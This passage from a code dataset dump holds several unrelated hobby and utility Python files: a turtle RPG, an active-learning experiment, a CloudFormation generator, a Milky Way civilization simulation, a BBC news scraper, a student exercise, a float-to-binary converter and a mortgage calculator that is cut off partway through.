Goblin()\n goblin.shape(\"pixel_goblin.gif\")\n goblin.up()\n goblin.setpos(goblin_startPos)\n\n pen.up()\n pen.setpos(-190, 0)\n pen.down()\n\n canvas.update()\n canvas.tracer(original_tracer, 0)\n # inital encounter drawing\n for flicker in range(5):\n canvas.bgcolor(\"White\")\n pen.write(\"ENCOUNTER\", font=(\"Arial\", cls.font_size, \"normal\"))\n time.sleep(0.1)\n canvas.bgcolor(\"Black\")\n pen.write(\"ENCOUNTER\", font=(\"Arial\", cls.font_size, \"normal\"))\n time.sleep(0.1)\n\n while encounter == True:\n pen.clear()\n canvas.bgcolor(\"Black\")\n init_attack(hero, goblin, pen)\n\n time.sleep(2) # sets frame refresh speed - at least that's the idea\n break\n\n @classmethod\n def kill_display(cls):\n kills = int(object_handler.get_kills())\n pen = cls.pen\n pen.up()\n pen.setpos(cls.kill_display_pos[0], cls.kill_display_pos[1])\n pen.write(\"Kills: {}\".format(kills), font=(\"Arial\", cls.font_size, \"normal\"))\n pen.down()\n\nclass Character(turtle.Turtle): # character as a subclass of Turtle object mother-class\n\n armour_break_light = 100 #10\n armour_break_heavy = 100 #20\n armour_break_crit = 100 #50\n\n # critical hit adds 50% to the persistent chance\n\n def setWeapon(self):\n print(\"These are the possible weapons: \")\n for k, item in enumerate(self.weapons):\n print((\"{}. \" + item).format(k + 1))\n print(\"Enter the number of your choice\")\n\n while True:\n self.choice = input()\n try:\n self.choice.isdigit()\n (int(self.choice) - 1) in list(range(0, len(self.weapons)))\n break\n\n except:\n print(\"Enter valid number\")\n\n return self.choice\n\n def takePotion(self):\n self.health += 500\n print(\"Health increased by 500 to a total of {}\".format(self.health))\n\n def getAttacked(self, dmg_prop, pen_object):\n # dmg_prop is a tupel (type, lower_ranger, upper_range,\n # hit_chance, crit_rate, weapon), hit_chance is the hit probability of the enemy attack\n # determining hit by hit chance of enemy attack\n hit = False\n dodge = False\n crit = False\n t_dmg = None\n armour_break = False\n\n if random.randint(0, 100) > dmg_prop[3]: # it is hit chance therefore '>'\n print(\"Narrator: Attack missed!\")\n print()\n hit = False\n else:\n print(\"Narrator: Attack about to hit...\", end=\" \")\n time.sleep(1)\n # determining ability to dodge of this char\n if random.randint(0, 100) <= self.agility:\n print(\"but got dodged!\")\n dodge = True\n hit = False\n\n else:\n print(\"and was not dodged!\")\n dodge = False\n hit = True\n\n if hit == True and dodge == False:\n\n # determining a critical hit \n rand = random.randint(0, 100)\n print(\"Random number for crit: {}\".format(rand))\n print(\"Dmg_prop[0]: {}\".format(dmg_prop[0]))\n print(\"Dmg_prop[1]: {}\".format(dmg_prop[1]))\n print(\"Dmg_prop[2]: {}\".format(dmg_prop[2]))\n print(\"Dmg_prop[3]: {}\".format(dmg_prop[3]))\n print(\"Dmg_prop[4]: {}\".format(dmg_prop[4]))\n\n if rand <= dmg_prop[4]:\n crit = True\n print(\"Narrator: Critical hit!\")\n else:\n print(\"Narrator: No critical hit.\")\n\n # determining armour break\n print(\"dmg_prop[0]: {}\".format(dmg_prop[0]))\n if dmg_prop[0] == \"light\":\n if random.randint(0, 100) <= Character.armour_break_light:\n armour_break = True\n print(\"Narrator: Light attack broke the armour\")\n self.armour = self.armour * 0.75\n elif dmg_prop[0] == \"heavy\":\n if random.randint(0, 100) <= Character.armour_break_heavy:\n armour_break = True\n print(\"Narrator: Heavy attack broke the armour\")\n self.armour = self.armour * 0.75\n elif crit == True:\n if random.randint(0, 100) <= Character.armour_break_crit:\n armour_break = True\n print(\"Narrator: Critical {} attack broke the armour\".format(dmg_prop[0]))\n self.armour = self.armour * 0.75\n\n#--------------------final dmg calculation------------------------------------------\n\n if crit == True and hit == True:\n t_dmg = random.randint(dmg_prop[1], dmg_prop[2]) * ((100 - self.armour) / 100) * 2 # double crit dmg + deduct the armour mitigation value\n elif crit == False and hit == True:\n t_dmg = random.randint(dmg_prop[1], dmg_prop[2]) * ((100 - self.armour) / 100)\n\n print(\"Narrator: Damage inflicted: \" + str(int(t_dmg)))\n self.health -= t_dmg\n if self.health > 0:\n print(\n \"Narrator: Remaining health of \" + str(self.__class__.__name__) + \" \" + str(self.name) + \": \" + str(\n int(self.health)))\n print(\n \"Narrator: Remaining armour of \" + str(self.__class__.__name__) + \" \" + str(self.name) + \": \" + str(\n int(self.armour)))\n print(str(__class__.__name__) + \" \" + str(self.name) + \": \" + self.phrases[\n random.randint(0, len(self.phrases) - 1)])\n else:\n print(\"{} received fatal damage!!!\".format(self.name))\n object_handler.kill_counter(self.__class__.__name__)\n\n return (hit, dodge, crit, t_dmg, armour_break) # t_dmg = total resulting damage\n\n\nclass Knight(Character):\n health = 2000\n armour = 50\n agility = 15\n charisma = 8\n dmg = 10 # setWeapon defines dmg according to weapon chosen\n hit_c = 30 # setWeapon defines hit chance according to weapon chosen\n crit_c = 30 # 5 setWeapon defines critical hit chance according to weapon chosen\n\n weapons = (\"longsword\", \"shield and sword\")\n phrases = (\"Deus Vult!\", \"Come here you infidel!\", \"Let me bring you justice!\", \"For the holy land\",\n \"God be my witness as I slay this abstorsity!\")\n\n # possible weapons: longsword, shield and one-handed sword\n\n def __init__(self, name=\"Holy Crusader\", *args, **kwargs):\n self.name = name\n self.setWeapon()\n super(Knight, self).__init__(*args,\n **kwargs) # executes the turtle __init__ and makes the knight object able to do everyting turtle does :DD\n\n # ---------------------------- ACTIONS ------------------------------------------------------------\n def setWeapon(self):\n self.choice = super(Knight, self).setWeapon()\n\n if self.choice == \"1\":\n self.weapon = \"longsword\"\n self.dmg = (500, 750)\n self.agility -= 5\n self.hit_c = 100 #85\n self.crit_c = 100 #30\n\n elif self.choice == \"2\":\n self.weapon = \"shield and sword\"\n self.dmg = (300, 450)\n self.armour += 10\n self.hit_c = 100 #90\n self.crit_c = 100 #25\n else:\n print(\"no weapon set\")\n\n print((\"{} successfully equiped\").format(self.weapon))\n\n def attacks(self):\n light = (\"light\", self.dmg[0], int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.hit_c, self.crit_c,\n self.weapon)\n heavy = (\"heavy\", int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.dmg[1], self.hit_c, self.crit_c,\n self.weapon)\n\n return (light, heavy)\n\n\nclass Goblin(Character):\n health = 1250\n armour = 10\n agility = 0 #20-30\n charisma = 1\n dmg = 10 # setWeapon defines dmg according to weapon chosen\n hit_c = 10 # setWeapon defines hit chance according to weapon chosen\n crit_c = 5 # setWeapon defines critical hit chance according to weapon chosen\n\n weapons = (\"dual dagger\")\n phrases = (\"Arrrrrgg!\", \"Brains and flesh!\", \"Lemme smash!\")\n\n def __init__(self, name=\"Filth\"):\n self.name = name\n self.setWeapon()\n super(Goblin,\n self).__init__() # executes the turtle __init__ and makes the knight object able to do everyting turtle does :DD\n\n # ---------------------------- ACTIONS ------------------------------------------------------------\n def setWeapon(self):\n self.weapon = \"dual daggers\"\n self.dmg = (250, 500)\n self.hit_c = 70\n self.crit_c = 40\n\n def attacks(self):\n light = (\"light\", self.dmg[0], int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.hit_c, self.crit_c,\n self.weapon)\n heavy = (\"heavy\", int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.dmg[1], self.hit_c, self.crit_c,\n self.weapon)\n\n return (light, heavy)\n\n\n# ----------------------------------------Initionation and Object handling-----------------------------------------------\nclass object_handler: # nicht zu instansierende Klasse, keine (self)\n current_heros = []\n current_NPC = []\n current_screens = []\n total_kills = 0\n goblin_kills = 0\n # here add new npc's to distinguish kills\n\n @classmethod\n def get_kills(cls):\n return cls.total_kills\n\n @classmethod\n def kill_counter(cls, kill_type): #kill_tpye will be class.__name__ of killed object\n if kill_type == Goblin.__class__.__name__:\n cls.goblin_kills += 1\n\n cls.total_kills += 1\n\n @staticmethod\n def get_object_list():\n return (object_handler.current_heros, object_handler.current_NPC, object_handler.current_screens)\n\n # Frage: self in jeder methode einer classe? wenn eigentlich nicht umbedingt object instancen erstellt werden müssen? Wie importiert man Classen richtig in andere und verwendet so übergreifend module?\n def add_hero(new_hero):\n object_handler.current_heros.append(new_hero)\n # print(object_handler.current_heros[0].dmg)\n\n def add_NPC(new_NPC):\n object_handler.current_NPC.append(new_NPC)\n\n def add_screen(new_screen):\n object_handler.current_screens.append(new_screen)\n\n\n# ------------------------SETUP-----------------------\n\nclass Setup:\n char_list = [\"Knight\", \"Rouge\", \"Mage\"]\n\n def __init__(self):\n self.welcome()\n self.selectChar()\n # self.createNPC(10) easier to handle when created during encounter...\n\n def welcome(self):\n print(\"Welcome to 'Goblin Unslaught'\")\n # time.sleep(1)\n\n def selectChar(self):\n print(\"Please select one char with the corresponding number\")\n for counter, hero in enumerate(Setup.char_list):\n print(\"{}. {}\".format(counter + 1, hero))\n print(\"-------------------------------\")\n while True:\n self.selected_char = input()\n\n try:\n self.selected_char.isdigit()\n (int(self.selected_char) - 1) in list(range(0, len(Setup.char_list)))\n break\n except:\n print(\"Please enter a valid number\")\n\n while True:\n\n char_name = str(input(\"Choose a name for your hero: \"))\n print(\"-------------------------------\")\n try:\n len(char_name) > 0\n break\n\n except:\n print(\"Try again..\")\n pass\n\n if self.selected_char == \"1\":\n object_handler.add_hero(Knight(char_name))\n elif self.selected_char == \"2\":\n object_handler.add_hero(rouge(char_name))\n elif self.selected_char == \"3\":\n object_handler.add_hero(mage(char_name))\n\n def createNPC(self, amount): #for now the same Goblin spawns over and over. No need specifically to create multiple objects (same starting health?) but necessary when different NPC's are precent -> new handler for each obejct then\n self.amount = amount\n for npc in range(amount):\n object_handler.add_NPC(Goblin())\n print(\"Narrator: Be wary traveler, {} goblins spawned nearby!\".format(amount))\n return amount\n\n\nclass Move:\n step = 60 #40\n encounter = False\n hero_pos_before_enc = 0\n\n # classen methoden sind statisch und können ähnlich wie instancen mit self, durch cls auf klassen\n # level ansprechen -> step auf classen level hätte auch mit Move.step angesprochen werden können, aber es ist\n # sauberer es mit dem decorator @classmethod zu machen, da es so wirklich die direkte classe anspricht und\n # falschverweise ausschliesst.\n @classmethod\n def checkBorder(cls, hero):\n print(\"Checking border\")\n hero_pos = hero.position()\n if hero.heading() == 0:\n if hero_pos[0] + cls.step >= 345:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(-hero_pos[0], hero_pos[1])\n hero.st()\n\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 90:\n if hero_pos[1] + cls.step >= 245:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(hero_pos[0], -hero_pos[1])\n hero.st()\n\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 180:\n if hero_pos[0] - cls.step <= -345:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(abs(hero_pos[0]), hero_pos[1])\n hero.st()\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 270:\n if hero_pos[1] - cls.step <= -245:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(hero_pos[0], abs(hero_pos[1]))\n hero.st()\n else:\n hero.fd(cls.step)\n\n def checkPotion(hero):\n potions = Draw.list_potions\n print(\"Potions\" + str(potions))\n hit_potion = False\n for key in list(potions):\n if hero.distance(potions[key]) <= 25:\n print(\"Collission\")\n hit_potion = True\n # Draw.redraw(hit_potion, key)\n del potions[key]\n print(\"after del: \" + str(potions))\n object_handler.current_heros[0].takePotion()\n\n @classmethod\n def checkEncounter(cls):\n encounter_chance = 100\n if random.randint(0, 100) <= encounter_chance:\n cls.encounter = True\n cls.hero_pos_before_enc = object_handler.current_heros[0].position()\n\n @classmethod\n def basicMoveEvent(cls, hero, canvas):\n time.sleep(0.25)\n if cls.encounter == False:\n Move.checkBorder(hero)\n time.sleep(0.1)\n Move.checkPotion(hero)\n Move.checkEncounter()\n Draw.redraw(canvas, cls.encounter)\n else:\n # here goes move list while in incounter\n pass\n\n @classmethod\n def left(cls, hero, canvas):\n hero.setheading(180)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def right(cls, hero, canvas):\n hero.setheading(0)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def up(cls, hero, canvas):\n hero.setheading(90)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def down(cls, hero, canvas):\n hero.setheading(270)\n cls.basicMoveEvent(hero, canvas)\n\n\ndef main():\n Setup()\n hero = object_handler.current_heros[0]\n hero.up()\n hero.setheading(90)\n hero.setpos(0, -150)\n screen = turtle.Screen()\n screen.screensize(700, 500)\n screen.setup(720, 520, 0, 0)\n screen.bgcolor(\"green\")\n\n shapes = [\"pixel_goblin.gif\", \"pixel_knight.gif\", \"armour_break_status.gif\"]\n\n for shape in shapes:\n print(\"{} {}\".format(shape, type(shape)))\n screen.register_shape(shape)\n # screen.register_shape(\"pixel_goblin.gif\")\n # screen.register_shape(\"pixel_knight.gif\")\n #screen.register_shape(\"armour_break_status.png\")\n # while True: #main loop\n # encounter = False\n Draw.environment(screen)\n\n # --------------Events--------------------------\n screen.onkey(lambda arg=hero, obj=screen: Move.up(arg, obj), \"Up\")\n screen.onkey(lambda arg=hero, obj=screen: Move.down(arg, obj), \"Down\")\n screen.onkey(lambda arg=hero, obj=screen: Move.left(arg, obj), \"Left\")\n screen.onkey(lambda arg=hero, obj=screen: Move.right(arg, obj), \"Right\")\n\n # if encounter == True:\n # Draw.encounter(screen)\n\n object_handler.add_screen(screen)\n\n screen.listen()\n screen.mainloop()\n\n\n # init_attack(object_handler.current_heros[0], object_handler.current_NPC[0])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bellador/RPGame","sub_path":"DaD.py","file_name":"DaD.py","file_ext":"py","file_size_in_byte":28198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961541927","text":"import os\nimport logging\nimport pickle\n\nimport numpy as np\n\nimport al\nfrom al.dataset import mnist\nfrom al.model.model_zoo.simple_cnn import ConvModel\nfrom al.model.mnist import MnistLearner\nfrom al.dataset.mnist import MnistDataset\nfrom al.train.active_train import ActiveTrain\nfrom al.helpers.experiment import set_up_experiment, load_config\nfrom al.experiments import set_up_learner\n\n\nFOLDER_PATH = os.path.dirname(__file__)\nOUTPUT_DIR, FIGURE_DIR, logger, logger_name = set_up_experiment(\n __file__, FOLDER_PATH, logging_lvl=20)\n\n\ndef experiment_with(dataset_name):\n config = load_config(FOLDER_PATH, dataset_name)\n setupper = set_up_learner(dataset_name)\n\n config['active_learning']['output_dir'] = OUTPUT_DIR\n config['experiment']['logger_name'] = logger_name\n model_name = config['experiment']['model']\n iterations_per_labeled_sample = config['experiment']['iterations_per_labeled_sample']\n size_to_label = config['experiment']['size_to_label']\n\n score_data = {}\n logger.info('---------------------------------------')\n logger.info(f'--LAUNCHING EXPERIMENTS ON {dataset_name}--')\n logger.info('---------------------------------------')\n for i in range(config['experiment']['repeats']):\n logger.info('---------------------------')\n logger.info(f'--------ROUND OF TRAININGS NUMBER #{i+1}--------')\n logger.info('---------------------------')\n for query_size in config['experiment']['query_sizes']:\n config['active_learning']['assets_per_query'] = query_size\n config['active_learning']['n_iter'] = np.ceil(\n size_to_label / query_size).astype(int)\n dataset, learner = setupper(\n config, OUTPUT_DIR, logger, queries_name=f'queries-{query_size}-{i}-{model_name}.txt')\n logger.info('---------------------------')\n logger.info(f'----QUERY SIZE : {query_size}----')\n logger.info('---------------------------')\n trainer = ActiveTrain(\n learner, dataset, config['experiment']['strategy'], logger_name)\n scores = trainer.train(\n config['train_parameters'], **config['active_learning'])\n score_data[(query_size, i)] = scores\n logger.info(f'----DONE----\\n')\n logger.info('---------------------------')\n logger.info(f'--------DONE--------')\n logger.info('---------------------------\\n\\n\\n')\n if config['experiment']['save_results']:\n with open(f'{OUTPUT_DIR}/scores-{dataset_name}-{model_name}.pickle', 'wb') as f:\n pickle.dump(score_data, f)\n\n\nif __name__ == '__main__':\n dataset = 'mnist'\n experiment_with(dataset)\n","repo_name":"kili-technology/active-learning","sub_path":"experiments/query_size/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"28939546144","text":"import json\nimport yaml\nfrom myresources import autoscalinggroup, loadbalancer,parameter\nimport sys\n\n# Load requirements from YAML file\nwith open('asgtemplate2/autoscaling_requirements.yaml', 'r') as f:\n requirements = yaml.safe_load(f)\n print(requirements)\n# Define CloudFormation template structure\n# template = {\n# \"Parameters\" : parameter.get_resource(),\n# \"Resources\": {\n# \"MyAutoScalingGroup\": autoscalinggroup.get_resource(requirements),\n# \"MyLaunchTemplate\": autoscalinggroup.get_launch_configuration(requirements)\n# }\n# }\n\ntemplate = {\n \"Parameters\" : sys.argv[1],\n \"Resources\": {\n \"MyAutoScalingGroup\": autoscalinggroup.get_resource(requirements),\n \"MyLaunchTemplate\": autoscalinggroup.get_launch_configuration(requirements)\n }\n}\n\nprint(template)\n# Add Elastic Load Balancer resource and update launch configuration\nif requirements.get('load_balancer', {}).get('enabled', False):\n elb_resource = loadbalancer.get_resource(requirements)\n print(elb_resource)\n template['Resources']['ElasticLoadBalancer'] = elb_resource\n template['Resources']['MyLaunchTemplate']['Properties']['LoadBalancerNames'] = [{\"Ref\": \"ElasticLoadBalancer\"}]\n\n# Save CloudFormation template as JSON file\nwith open('asgtemplate2/autoscaling_template.json', 'w') as f:\n json.dump(template, f)\n\n# Output success message\nprint(\"CloudFormation template generated and saved as autoscaling_template.json\")\n\n\n","repo_name":"priyanka-ttn0/hello-world-maven","sub_path":"asgtemplate2/createresource.py","file_name":"createresource.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"34288414831","text":"#create a model of milkyway \nfrom random import randint #library for random choice\nfrom collections import Counter \nimport numpy as np \nimport matplotlib.pyplot as plt \n\nNUM_EQUIV_VOLUMES = 1000 #number of locations to place civs\nMAX_CIVS = 5000 #maximum number of advanced civs\nTRIALS = 1000 #number of times to model a given number of civs\nCIV_STEP_SIZE = 100 #civilizations count step\n\nx = [] # x values for polynomial fit\ny = [] #y values for polynomial fit\n\n# make a for loop\nfor num_civs in range(2, MAX_CIVS + 2, CIV_STEP_SIZE):\n civs_per_vol = num_civs / NUM_EQUIV_VOLUMES\n num_single_civs = 0\n for trial in range(TRIALS):\n locations = []\n while len(locations) < num_civs:\n location = randint(1, NUM_EQUIV_VOLUMES)\n locations.append(location)\n overlap_count = Counter(locations)\n overlap_rollup = Counter(overlap_count.values())\n num_single_civs += overlap_rollup[1]\n\n prob = 1 - (num_single_civs / (num_civs * TRIALS))\n # print ratio of civs-per-volume vs probability of 2+ civs per location\n print(\"{:.4f} {:.4f}\".format(civs_per_vol, prob))\n x.append(civs_per_vol)\n y.append(prob)\n\n# part2\ncoefficients = np.polyfit(x, y, 4) #4th order polynomial fit\np = np.poly1d(coefficients)\nprint('\\n{}'.format(p))\nxp = np.linspace(0,5)\n_ = plt.plot(x, y, '.', xp, p(xp), '-')\nplt.ylim(-0.5, 1.5)\nplt.show()","repo_name":"fancyf33t/MilkyWayModel","sub_path":"probability_of_detection.py","file_name":"probability_of_detection.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"45407941403","text":"from urllib.parse import urlparse\n\nimport scrapy\n\n\nclass BBCSpider(scrapy.Spider):\n name = \"bbc\"\n allowed_domains = [\"bbc.com\"]\n start_urls = [\"https://www.bbc.com\"]\n\n def remove_domain(self, urls):\n cleaned_urls = []\n for url in urls:\n parsed_url = urlparse(url)\n cleaned_urls.append(parsed_url.path)\n return cleaned_urls\n\n def parse(self, response):\n articles = self.remove_domain(response.css(\"a.media__link ::attr(href)\").getall())\n tags = response.css(\"a.media__tag ::text\").getall()\n\n home_page_titles = [title.strip() if title else \"\" for title in response.css(\"a.media__link::text\").getall()]\n\n for article, home_page_title, tag in zip(articles, home_page_titles, tags):\n yield response.follow(\n article,\n callback=self.parse_article,\n meta={\n \"home_page_title\": home_page_title,\n \"tag\": tag,\n },\n dont_filter=True,\n )\n\n def parse_article(self, response):\n \"\"\"\n Parse Articles Detail Page\n \"\"\"\n\n page_title = response.css(\"h1::text\").get()\n article_detail_page_image = response.css(\"meta[property='og:image']::attr(content)\").get()\n\n if not page_title:\n page_title = response.css(\"#main-heading > span::text\").get()\n\n home_page_title = response.meta[\"home_page_title\"]\n\n data = {}\n\n # If title on home page is different than the title on articles detail page, show both titles\n if page_title != home_page_title:\n data[\"home_page_title\"] = home_page_title\n\n data_dict = {\n \"page_title\": page_title.strip() if page_title else \"\",\n \"image\": article_detail_page_image if \"live\" not in response.url else \"LIVE PAGE\",\n \"url\": response.url,\n \"tag\": response.meta[\"tag\"],\n }\n\n data.update(data_dict)\n yield data\n","repo_name":"afafadia/scrapy_bbc","sub_path":"scrapy_bbc/spiders/bbc.py","file_name":"bbc.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37354667760","text":"#ques1\r\n#pyhton program to find average of 3 numbers\r\n#take input\r\nnum1=float(input('Enter first number: '))\r\nnum2=float(input('Enter second number: '))\r\nnum3=float(input('Enter third number: '))\r\n#calculate average\r\navg=(num1 + num2 +num3)/3\r\n#result\r\nprint(avg)\r\n\r\n#ques 2\r\n#pyhton program to compute person's income tax\r\n#input gross income\r\ngrossinc=float(input('Enter your gross income: '))\r\n#input number of dependents\r\ndependents=float(input('Enter number of dependents: '))\r\ntaxableincome=grossinc-10000-(dependents*3000)\r\ntax=(20*taxableincome)/100\r\nprint(tax)\r\n\r\n#ques 3\r\n#python program to store different data type in list\r\n#input\r\nname=input('Enter your name: ')\r\ngender=input('Your Gender(M for male , F for female , U for unknown):')\r\nSID=input('Enter your SID: ')\r\nCourseName=input('Enter your course name: ')\r\nCGPA=float(input('Enter your CGPA: '))\r\nstudent=[SID,name,gender,CourseName,CGPA]\r\nprint(student)\r\n\r\n#ques 4\r\n#Write a python program to enter marks of 5 students into a list and display\r\n#them in sorted manner.\r\nnum1=float(input('Enter marks of student 1: '))\r\nnum2=float(input('Enter marks of student 2: '))\r\nnum3=float(input('Enter marks of student 3: '))\r\nnum4=float(input('Enter marks of student 4: '))\r\nnum5=float(input('Enter marks of student 5: '))\r\nmarks=[num1,num2,num3,num4,num5]\r\nprint(marks)\r\n\r\n#ques 5\r\n#5-a\r\ncolor1=['Red','Green','White','Black','Pink','Yellow']\r\nprint(color1)\r\ncolor1.pop(3)\r\nprint(color1)\r\n\r\n#5-b\r\ncolor2=['Red','Green','White','Black','Pink','Yellow']\r\ncolor2[3:5]=['Purple']\r\nprint(color2)\r\n","repo_name":"JatinKharbanda21104077/Computing-Assignment","sub_path":"Assign1_21104077.py","file_name":"Assign1_21104077.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11171773276","text":"import sys\n\ninput = sys.stdin.readline\n\nN, S = map(int, input().split())\narray = list(map(int, input().split()))\n\nleft, right = 0, 0\ncurrent_sum = array[0]\nmin_length = 100001\nwhile (True):\n if (left > right) or (right >= len(array)):\n break\n\n if current_sum < S:\n right += 1\n if right >= len(array):\n break\n current_sum += array[right]\n continue\n\n # print(\"left, right\", left, right)\n # print(\"array[left], array[right]\", array[left], array[right])\n # print(\"length, min_length\", right - left + 1, min_length)\n min_length = min(min_length, right - left + 1)\n current_sum -= array[left]\n left += 1\n\nprint(min_length if min_length != 100001 else 0)\n","repo_name":"b2s-study/ps-study-step1","sub_path":"Baekjoon/dj-1087/[1806] 부분합.py","file_name":"[1806] 부분합.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72112617794","text":"#CLI like interface\n\nimport argparse, getopt, os, io, struct, mtproto\nfrom classes.shell import TelepyShell\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('telepy',description='Python implementation of telegram API.')\n parser.add_argument('command', nargs='?', choices=['cmd', 'dialog_list', 'contact_list'] + ['chat_' + sub for sub in ['info', 'add_user', 'add_user_to_chat', 'del_user', 'set_photo', 'rename']])\n parser.add_argument('args', nargs='*')\n\n #for command, args, help in (('info', 1, 'prints info about chat'), ('add_user', 2, 'add user to chat'), ('del_user', 2, 'remove user from chat'), ('set_photo', 1, 'sets group chat photo. Same limits as for profile photos.')):\n # parser.add_argument('chat_' + command, nargs=args, help=help)\n #parser.add_argument\n args = parser.parse_args()\n\n if args.command is None:\n TelepyShell().cmdloop()","repo_name":"griganton/telepy_old","sub_path":"telepy.py","file_name":"telepy.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"29550757113","text":"\nclass PrecisionError(Exception):\n pass\n\ndef get_binary_integers(integer: int) -> list:\n exponents = []\n while integer:\n quotient, exp = integer // 2, integer % 2\n exponents.append(exp)\n integer = quotient\n return exponents[::-1]\n\n\ndef get_biased_form(exponent: int) -> list:\n bias = get_binary_integers(127 + exponent)\n return right_pad(bias, 8)\n\n\ndef get_binary_decimals(fraction: float) -> list:\n mantissa = []\n while fraction and len(mantissa) < 23:\n fraction = fraction * 2\n decimal = int(fraction)\n mantissa.append(decimal)\n fraction = fraction - decimal\n\n if fraction:\n raise PrecisionError(\n \"Insufficient precision, cannot represent value in binary format.\"\n )\n return mantissa\n\n\ndef get_exponent(integers, mantissa):\n if integers and integers[0] == 1:\n exp = len(integers) - 1\n else:\n exp = -1\n for v in mantissa:\n if v == 0:\n exp -= 1\n else:\n break\n return exp\n\n\ndef left_pad(arr: list, size: int):\n while len(arr) < size:\n arr = arr + [0]\n return arr\n\n\ndef right_pad(arr: list, size: int):\n while len(arr) < size:\n arr = [0] + arr\n return arr\n\n\ndef get_significand(integers: list, decimals: list, exponent: int):\n mantissa = integers + decimals\n if exponent < 0:\n significand = mantissa[abs(exponent):]\n else:\n significand = mantissa[1:]\n return left_pad(significand, 23)\n\n\ndef float_to_binary_form(float_number: float):\n sign = [1] if float_number < 0 else [0]\n integers, decimals = int(float_number), abs(float_number - int(float_number))\n integers = get_binary_integers(integers)\n decimals = get_binary_decimals(decimals)\n exponent = get_exponent(integers, decimals)\n significand = get_significand(integers, decimals,exponent)\n exponent = get_biased_form(exponent)\n binary_form = sign + exponent + significand\n print(binary_form)\n return \"\".join(str(d) for d in binary_form)\n","repo_name":"yassineayadi/ctci-python","sub_path":"src/chapter05/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42272138340","text":"import math\nimport ulab.numpy as np\nimport time\n\n\ndef FFT(samples, timevector, sample_rate):\n y = samples # the data to make the fft from\n n = len(y) # length of the signal\n k = np.arange(n)\n T = n/sample_rate\n frq = k/T # two sides frequency range\n Y, img = np.fft.fft(y) # fft computing and normalization\n\n return frq, Y\n\nL = 1024\n\ntimevec = np.arange(L)\nsineWave1 = np.zeros(L)\nsineWave2 = np.zeros(L)\nsineWave3 = np.zeros(L)\nsumSines = np.zeros(L)\n\nF1 = 1\nF2 = 5\nF3 = 10\n\nfor i in range(L):\n sineWave1[i] = math.sin(2*math.pi*F1*(i/1024))\n sineWave2[i] = math.sin(2*math.pi*F2*(i/1024))\n sineWave3[i] = math.sin(2*math.pi*F3*(i/1024))\n sumSines[i] = sineWave1[i] + sineWave2[2] + sineWave3[i]\n\nfrq, Y = FFT(sumSines, timevec, 1024)\n\nprint(Y[0])\n\nfor i in range(L):\n if i % 11 == 0:\n print(\"(\"+str(math.log(abs(Y[i])))+\")\")\n time.sleep(.005)\n\n","repo_name":"kkrausplymouth/ME433","sub_path":"HW11/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23708669048","text":"# Python Mortgage Calculator\n# First Codecademy project: utilizing Terminal, Git, Github, Object Oriented Programming\n\nclass MortgageCalculator:\n\n def __init__(self, yearly_percentage_rate, loan_term, principal):\n self.yearly_percentage_rate = yearly_percentage_rate\n self.loan_term = loan_term\n self.principal = principal\n self.monthly_percentage_rate = self.yearly_percentage_rate / 12\n self.number_monthly_payments = self.loan_term * 12\n\n def monthly_percentage(self):\n\n # Monthly percentage rate\n return \"Your monthly percentage rate = \" + \"{:.3f}\".format(self.monthly_percentage_rate)\n\n def number_payments(self):\n \n # Number of monthly payments\n return \"Your number of payments = \" + str(self.number_monthly_payments)\n\n def calculate_monthly_payment(self):\n \n # Calculate monthly payment\n if self.monthly_percentage_rate != 0:\n monthly_payment = ((self.monthly_percentage_rate * self.principal) / (1 - (1 + self.monthly_percentage_rate) ** -self.number_monthly_payments))\n else:\n monthly_payment = self.principal / self.number_monthly_payments\n\n return \"Your monthly payment = $\" + \"{:.2f}\".format(monthly_payment)\n\n def calculate_debt_schedule(self):\n # Shows the amount owed every month\n for i in range(self.number_monthly_payments):\n p = self.principal\n x = (1 + self.monthly_percentage_rate)\n # Polynomial of x\n pn_x = ((x ** i - 1) / (x - 1))\n # Monthly payment\n c = ((self.monthly_percentage_rate * self.principal) / (1 - (1 + self.monthly_percentage_rate) ** -self.number_monthly_payments))\n # Calculates the amount owed\n amount_owed = x ** i * p - pn_x * c\n print(\"Amount owed at month {} = {:.2f}\".format(i + 1, amount_owed))\n i += 1\n\ndef run_calculator():\n\n # Choice to 